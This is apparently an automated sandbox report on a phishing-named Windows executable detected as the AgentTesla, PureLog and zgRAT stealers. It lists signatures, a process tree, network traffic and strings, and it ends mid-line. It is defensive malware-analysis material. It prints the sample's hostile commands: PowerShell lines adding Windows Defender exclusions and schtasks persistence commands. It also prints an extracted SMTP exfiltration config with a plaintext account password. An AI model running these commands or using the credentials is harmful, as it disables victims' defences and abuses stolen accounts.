Windows Analysis Report
DHL Delivery Invoice.exe

Overview

General Information

Sample name: DHL Delivery Invoice.exe
Analysis ID: 1564050
MD5: 9af85d4623cafa79192f542727a6e923
SHA1: 3739dbeeec123626e43210a4daf52d07b2a4247e
SHA256: 320bf0a79235fdbfd5d1adadcfc530e134d9cf3aa67bfb5c63dfddbc3bb3963f
Tags: DHL, exe, user-abuse_ch
Infos:

Detection

AgentTesla, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DHL Delivery Invoice.exe (PID: 6724 cmdline: "C:\Users\user\Desktop\DHL Delivery Invoice.exe" MD5: 9AF85D4623CAFA79192F542727A6E923)
    • powershell.exe (PID: 5820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2840 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7260 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3720 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DHL Delivery Invoice.exe (PID: 6432 cmdline: "C:\Users\user\Desktop\DHL Delivery Invoice.exe" MD5: 9AF85D4623CAFA79192F542727A6E923)
    • DHL Delivery Invoice.exe (PID: 2032 cmdline: "C:\Users\user\Desktop\DHL Delivery Invoice.exe" MD5: 9AF85D4623CAFA79192F542727A6E923)
  • LIWBHGsz.exe (PID: 2852 cmdline: C:\Users\user\AppData\Roaming\LIWBHGsz.exe MD5: 9AF85D4623CAFA79192F542727A6E923)
    • schtasks.exe (PID: 7392 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • LIWBHGsz.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Roaming\LIWBHGsz.exe" MD5: 9AF85D4623CAFA79192F542727A6E923)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: zgRAT
Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "wizzy@transmedmaritime.cf", "Password": "!feanyi#@12"}
Source: 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000000.00000002.1843513866.00000000079A0000.00000004.08000000.00040000.00000000.sdmp, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security

Source: 0.2.DHL Delivery Invoice.exe.4335828.4.raw.unpack, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 0.2.DHL Delivery Invoice.exe.79a0000.5.unpack, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 0.2.DHL Delivery Invoice.exe.4355848.2.unpack, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 0.2.DHL Delivery Invoice.exe.79a0000.5.raw.unpack, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 0.2.DHL Delivery Invoice.exe.4335828.4.unpack, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ParentImage: C:\Users\user\Desktop\DHL Delivery Invoice.exe, ParentProcessId: 6724, ParentProcessName: DHL Delivery Invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ProcessId: 5820, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, ParentImage: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, ParentProcessId: 2852, ParentProcessName: LIWBHGsz.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp", ProcessId: 7392, ProcessName: schtasks.exe
Source: Network Connection, Author: frack113, Data: DestinationIp: 77.88.21.158, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Initiated: true, ProcessId: 2032, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ParentImage: C:\Users\user\Desktop\DHL Delivery Invoice.exe, ParentProcessId: 6724, ParentProcessName: DHL Delivery Invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", ProcessId: 3720, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ParentImage: C:\Users\user\Desktop\DHL Delivery Invoice.exe, ParentProcessId: 6724, ParentProcessName: DHL Delivery Invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ProcessId: 5820, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ParentImage: C:\Users\user\Desktop\DHL Delivery Invoice.exe, ParentProcessId: 6724, ParentProcessName: DHL Delivery Invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", ProcessId: 3720, ProcessName: schtasks.exe
No Suricata rule has matched

AV Detection

Source: 10.2.LIWBHGsz.exe.4909990.1.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "wizzy@transmedmaritime.cf", "Password": "!feanyi#@12"}
Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, ReversingLabs: Detection: 52%
Source: DHL Delivery Invoice.exe, ReversingLabs: Detection: 52%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Joe Sandbox ML: detected
Source: DHL Delivery Invoice.exe, Joe Sandbox ML: detected
Source: DHL Delivery Invoice.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: DHL Delivery Invoice.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Yara match, File source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPE
Source: global traffic, TCP traffic: 192.168.2.4:49735 -> 77.88.21.158:587
Source: Joe Sandbox View, IP Address: 104.26.12.205
Source: Joe Sandbox View, IP Address: 77.88.21.158
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0, Host: api.ipify.org, Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
Source: global traffic, DNS traffic detected: DNS query: smtp.yandex.com
LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003285000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4278117301.0000000006AD4000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4257158218.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: LIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsh
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002914000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4278167799.000000000633A000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4281289694.0000000009274000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.0000000006302000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.000000000930E000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4255566065.00000000012A9000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 
0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288279299.00000000094D0000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4278242421.0000000006AE2000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsrsaovsslca2018.crt07
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002CC3000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.000000000290C000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003223000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000035AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.yandex.com
                      Source: LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/_prof_basesDataSet.xsd
                      Source: LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/_prof_basesDataSet1.xsd
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/
                      Source: LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/activity/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/album/
                      Source: LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/channel/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/group/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/video/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4254539671.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4254547194.0000000000433000.00000040.00000400.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: LIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repositor
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002914000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4280859164.000000000924C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4278167799.000000000633A000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4281289694.0000000009274000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.0000000006302000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL 